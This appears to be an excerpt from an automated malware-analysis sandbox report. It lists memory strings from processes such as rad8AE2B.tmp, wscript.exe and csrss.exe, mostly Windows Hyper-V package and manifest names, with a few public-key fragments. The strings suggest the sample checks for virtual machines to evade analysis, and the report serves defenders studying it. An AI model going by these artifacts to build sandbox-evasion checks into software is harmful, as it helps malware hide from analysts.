Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.17134.1_none_2457e84548829177.manifest
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..nthfcvdev.resources_31bf3856ad364e35_10.0.17134.1_en-us_9c3432f847f5f8f0.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..failoverreplication_31bf3856ad364e35_10.0.17134.1_none_80458ecfde93ef21\
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.17134.48_none_d4ed173f61801406.manifest@/'LA
Source: wscript.exe, 00000001.00000002.8649199892.0000000002DDE000.00000004.sdmpBinary or memory string: Hyper-V RAW
Source: rad8AE2B.tmp, 00000006.00000002.9881647891.0000000004068000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catst
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vpcivdev_31bf3856ad364e35_10.0.17134.1_none_7873076add237d80\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-hypervcluster_31bf3856ad364e35_10.0.17134.1_none_d23c603739df2f63\9
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..vices-vm-deployment_31bf3856ad364e35_10.0.17134.1_none_d43b74ba5db8d712.manifest@
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum.db
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..-onecore-deployment_31bf3856ad364e35_10.0.17134.1_none_ca9236a4769cd0cd.manifest@
Source: rad8AE2B.tmp, 00000006.00000002.9881647891.0000000004068000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumstQ
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..lebrowser.resources_31bf3856ad364e35_10.0.17134.1_en-us_73034f3cf79a1975\
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-winhvr_31bf3856ad364e35_10.0.17134.1_none_2becad3b77bb3580.manifest14f
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumest..r
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-p..oyment-languagepack_31bf3856ad364e35_10.0.17134.1_en-us_7fb4b9d31b9d09e8.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.17134.48_none_28a3bf323de300ba.manifestc\
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum
Source: csrss.exe, 00000007.00000002.8986663720.0000000002712000.00000004.sdmpBinary or memory string: amd64_dual_tsusbhubfilter.inf_31bf3856ad364e35_10.0.17134.1_none_8abfd8e8cc7b9e4c\da70amd64_dual_wvmic_shutdown.inf_31bf3856ad364e35_10.0.17134.1_none_36194d50cbafa987\amd64_e2xw10x64.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_3f995ebb761ce9ea\amd64_dual_rtwlanu_oldic.inf_31bf3856ad364e35_10.0.17134.1_none_2fc0fce011dfb3bb\amd64_dual_transfercable.inf_31bf3856ad364e35_10.0.17134.1_none_d402232d8ab51364\amd64_dual_tsgenericusbdriver.inf_31bf3856ad364e35_10.0.17134.1_none_ca286e9e3a6bdb60\amd64_dual_sensorsalsdriver.inf_31bf3856ad364e35_10.0.17134.1_none_847807b0cdf36679\amd64_dual_xboxgipsynthetic.inf_31bf3856ad364e35_10.0.17134.1_none_01e5cd3901fe7446\40amd64_microsoft-hyper-v-ram-parser_31bf3856ad364e35_10.0.17134.1_none_d74ad2482ffdcb42\amd64_dual_wvmic_timesync.inf_31bf3856ad364e35_10.0.17134.1_none_e4bc66a832e3dbff\amd64_dual_usbcciddriver.inf_31bf3856ad364e35_10.0.17134.1_none_4070b1e28eb5028d\amd64_dual_wvmic_heartbeat.inf_31bf3856ad364e35_10.0.17134.1_none_8f1854ea8397fa4d\amd64_dual_rdcameradriv
Source: csrss.exe, 00000007.00000002.8986663720.0000000002712000.00000004.sdmp, csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmsp_31bf3856ad364e35_10.0.17134.1_none_1ac175bdc8f2a7d7\
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum\\
Source: rad8AE2B.tmp, 00000006.00000002.9831021987.0000000000981000.00000004.sdmpBinary or memory string: \??\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..nthfcvdev.resources_31bf3856ad364e35_10.0.17134.1_en-us_9c3432f847f5f8f0\*>x|m
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..oyment-languagepack_31bf3856ad364e35_10.0.17134.1_en-us_d4bc3c4a770c0641.manifest
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..oyment-languagepack_31bf3856ad364e35_10.0.17134.1_en-us_6340c1c9612e407b.manifest
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..group-vm-deployment_31bf3856ad364e35_10.0.17134.1_none_88bd3c16c482b637.manifest
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmsp.resources_31bf3856ad364e35_10.0.17134.1_en-us_96681ed56ec765c6.manifest DU[A")
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-ram-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_8051bd2040ebffa9.manifestkA
Source: csrss.exe, 00000007.00000002.8986663720.0000000002712000.00000004.sdmp, csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.17134.1_none_8ce33edadf477e7a\
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: rad8AE2B.tmp, 00000006.00000002.9831021987.0000000000981000.00000004.sdmpBinary or memory string: \??\C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\**
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.17134.81_none_30736e9038d6e6ac.manifest5\
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..failoverreplication_31bf3856ad364e35_10.0.17134.1_none_80458ecfde93ef21.manifestP
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..izationv2.resources_31bf3856ad364e35_10.0.17134.1_en-us_aea0b368e53cc261\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-3dvideo_31bf3856ad364e35_10.0.17134.1_none_bb0455987cc9b004\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-debug.resources_31bf3856ad364e35_10.0.17134.1_en-us_8e782c7a46f14b49\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-3dvideo_31bf3856ad364e35_10.0.17134.48_none_cf157924edc2
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.17134.1_none_e636218254eba71f.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-lun-parser_31bf3856ad364e35_10.0.17134.1_none_e6683e9b0956ac05.manifest0r
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum)N
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-3dvideo.resources_31bf3856ad364e35_10.0.17134.1_en-us_49c786157c795a73.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-winhv_31bf3856ad364e35_10.0.17134.1_none_c35bb6c84d5e4ad0.manifest\9eXpK_A
Source: rad8AE2B.tmp, 00000006.00000002.9937966678.00000000047BE000.00000004.sdmpBinary or memory string: VwsuEoyeix9nBff1PrdwzfLTAJjzRtwmrJlLCertvSI+T8uVmciRAgMBAAE=
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-socket-provider_31bf3856ad364e35_10.0.17134.81_none_0a34114fff806d3f.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9881647891.0000000004068000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat.sys
Source: rad8AE2B.tmp, 00000006.00000002.9881647891.0000000004068000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catst
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-3dvideo_31bf3856ad364e35_10.0.17134.1_none_bb0455987cc9b004.manifest6<p
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vmbus_31bf3856ad364e35_10.0.17134.1_none_bcf0637138185dcf.manifest\a4mqV^L
Source: csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-d..ypervisor.resources_31bf3856ad364e35_10.0.17134.1_en-us_f27d2f48e22200a4\amd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.17134.1_en-us_592a4468e416a24d\amd64_microsoft-hyper-v-h..t-service.resources_31bf3856ad364e35_10.0.17134.1_en-us_0d3e2a9bd4020545\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.17134.165_none_11e6025cbba84064\amd64_microsoft-hyper-v-m..apinabout.resources_31bf3856ad364e35_10.0.17134.1_en-us_02a473bf02f2a824\amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.17134.1_none_27198deddb7b50eb\amd64_microsoft-hyper-v-lun-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_15c27a1250ea6310\amd64_microsoft-hyper-v-m..-client.snapinabout_31bf3856ad364e35_10.0.17134.1_none_7338804b0eb50c17\amd64_microsoft-hyper-v-m..lebrowser.resources_31bf3856ad364e35_10.0.17134.1_en-us_73034f3cf79a1975\amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.17134.1_none_3ce1277763a2249b\amd64_microsoft-networksw..anagemen
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.17134.1_none_bd1bad59835abed8.manifestZ
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat.1.cat
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-h..t-service.resources_31bf3856ad364e35_10.0.17134.1_en-us_0d3e2a9bd4020545.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-socket-provider_31bf3856ad364e35_10.0.17134.1_none_f5d736b78ec0a239\4(
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumt
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-d..ypervisor.resources_31bf3856ad364e35_10.0.17134.1_en-us_f27d2f48e22200a4.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.17134.1_none_18c6a9392dd7eb3e\
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum
Source: csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-ram-parser_31bf3856ad364e35_10.0.17134.1_none_d74ad2482ffdcb42\amd64_dual_wvmic_shutdown.inf_31bf3856ad364e35_10.0.17134.1_none_36194d50cbafa987\amd64_dual_rtwlanu_oldic.inf_31bf3856ad364e35_10.0.17134.1_none_2fc0fce011dfb3bb\amd64_dual_wvmic_heartbeat.inf_31bf3856ad364e35_10.0.17134.1_none_8f1854ea8397fa4d\a70amd64_dual_sensorsalsdriver.inf_31bf3856ad364e35_10.0.17134.1_none_847807b0cdf36679\amd64_dual_usbcciddriver.inf_31bf3856ad364e35_10.0.17134.1_none_4070b1e28eb5028d\b600amd64_dual_transfercable.inf_31bf3856ad364e35_10.0.17134.1_none_d402232d8ab51364\9amd64_dual_wmbclass_wmc_union.inf_31bf3856ad364e35_10.0.17134.1_none_f0e56a6391b6ebc2\amd64_dual_xboxgipsynthetic.inf_31bf3856ad364e35_10.0.17134.1_none_01e5cd3901fe7446\40amd64_dual_wvmic_kvpexchange.inf_31bf3856ad364e35_10.0.17134.1_none_3386da29bb1b0b2f\amd64_dual_wvmic_timesync.inf_31bf3856ad364e35_10.0.17134.1_none_e4bc66a832e3dbff\3240amd64_dual_rdcameradriver.inf_31bf3856ad364e35_10.0.17134.1_none_2ca8891b3aeaacbd\amd64_dual_ts
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-tpm_31bf3856ad364e35_10.0.17134.1_none_604b83348a0c5e92\
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.17134.1_none_58d19a03c592a9cb.manifest0d\
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat.
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.17134.1_none_b7de7159233ab503.manifest\11
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.17134.112_none_17084bffb5c5c964\
Source: rad8AE2B.tmp, 00000006.00000002.9881647891.0000000004068000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catt<
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-k..erformance-counters_31bf3856ad364e35_10.0.17134.1_none_0fa1f97fe68f5a84.manifest
Source: rad8AE2B.tmp, 00000006.00000003.9451618682.0000000003F16000.00000004.sdmpBinary or memory string: swow64_windowspowershell_v1.0_modules_hyper-v_1.1_274139982b49eac9.cdf-ms
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.17134.1_none_1c1693f7c8171ba6.manifest79\
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat.catq
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catifest%
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumatt
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..omputelib.resources_31bf3856ad364e35_10.0.17134.1_en-us_a1cfee3fcfcbe4d8.manifestT
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-socket-provider_31bf3856ad364e35_10.0.17134.81_none_0a34114fff806d3f\
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catat
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmms.resources_31bf3856ad364e35_10.0.17134.1_en-us_2b9c39681a7206ff.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum.mum*
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vid_31bf3856ad364e35_10.0.17134.1_none_864a29a4e381d095.manifest2659\%p
Source: rad8AE2B.tmp, 00000006.00000003.8757040677.0000000003BE3000.00000004.sdmpBinary or memory string: wow64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.17134.1_none_c77057abb7bb80d3\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-tpm.resources_31bf3856ad364e35_10.0.17134.1_en-us_259560ef1632af7b\T
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumy
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catt=
Source: wscript.exe, 00000001.00000002.8654600004.0000000005440000.00000002.sdmp, rad8AE2B.tmp, 00000006.00000002.9859328234.00000000039B0000.00000002.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmwp.resources_31bf3856ad364e35_10.0.17134.1_en-us_662e0a371a2edd22.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.17134.1_none_69e85823c476b806\
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-lun-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_15c27a1250ea6310.manifestq
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.17134.1_none_c0dbf3b2f0877a05\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-computelib_31bf3856ad364e35_10.0.17134.1_none_9321c5b124bca3df\
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catata
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumb
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-p..-onecore-deployment_31bf3856ad364e35_10.0.17134.1_none_d91519867fe67212.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat\
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-guest-network-drivers_31bf3856ad364e35_10.0.17134.1_none_5c8a4254832126cf.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-management-clients_31bf3856ad364e35_10.0.17134.1_none_d80c4ce4e8fa0144\v
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.17134.1_none_3ce1277763a2249b.manifestt
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmp, csrss.exe, 00000007.00000002.8986663720.0000000002712000.00000004.sdmp, csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.17134.1_none_1c1693f7c8171ba6\
Source: wscript.exe, 00000001.00000002.8654600004.0000000005440000.00000002.sdmp, rad8AE2B.tmp, 00000006.00000002.9859328234.00000000039B0000.00000002.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cattstt
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..wallrules.resources_31bf3856ad364e35_10.0.17134.1_en-us_c011eec82bd47853.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat
Source: rad8AE2B.tmp, 00000006.00000002.9937805168.00000000047A0000.00000004.sdmpBinary or memory string: MIGJAoGBAOvJHrhM4OInasF8Qncydoq44LyqGPsQy3cofyXfOCmQEMu6KEcruGjQ
Source: rad8AE2B.tmp, 00000006.00000002.9920332018.000000000437F000.00000004.sdmpBinary or memory string: MIGJAoGBALA0Z0zCV1mYKIUzb8Pufeu/qY7gri17SSsL1QRizXqR3uT+JvMciVfk
Source: csrss.exe, 00000007.00000002.8986663720.0000000002712000.00000004.sdmpBinary or memory string: amd64_ipmidrv.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_2d93a60324c5d86c\amd64_ipoib6x.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_e59925927d88680e\amd64_hyperv-vmserial.resources_31bf3856ad364e35_10.0.17134.1_en-us_6d3c997783423a80\amd64_microsoft-windows-cmisetup_31bf3856ad364e35_10.0.17134.112_none_fc7bc47aae4d520f\amd64_keyboard.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_14295de0d5889a92\44amd64_iastorv.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_ce7487caeb282db1\amd64_hyperv-vmiccore.resources_31bf3856ad364e35_10.0.17134.1_en-us_b801a316901bad5b\amd64_hyperv-vmicvdev.resources_31bf3856ad364e35_10.0.17134.1_en-us_05720885d49a5857\amd64_ialpssi_gpio.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_a649fe25b1990444\amd64_itsas35i.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_f441e46bcde20aea\7amd64_hyperv-vmsynthnic.resources_31bf3856ad364e35_10.0.17134.1_en-us_32a65f534e80b7d2\amd64_hyperv-vmemulateddevices_31bf3856ad364e35_10.0.17134.81_none_a622801bed1b811f\amd64_iastorav.i
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vhd-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_0b749ee450213385.manifesttHZ!|A
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..edstorage.resources_31bf3856ad364e35_10.0.17134.1_en-us_bdfc93ec7698eb64.manifest1
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.17134.112_none_17084bffb5c5c964.manifest\
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.17134.1_none_8ce33edadf477e7a.manifest6\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-d..ypervisor.resources_31bf3856ad364e35_10.0.17134.1_en-us_f27d2f48e22200a4\
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat~
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-storflt_31bf3856ad364e35_10.0.17134.1_none_fc7308d7bbb0dfd6.manifest\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.17134.1_none_bd1bad59835abed8\
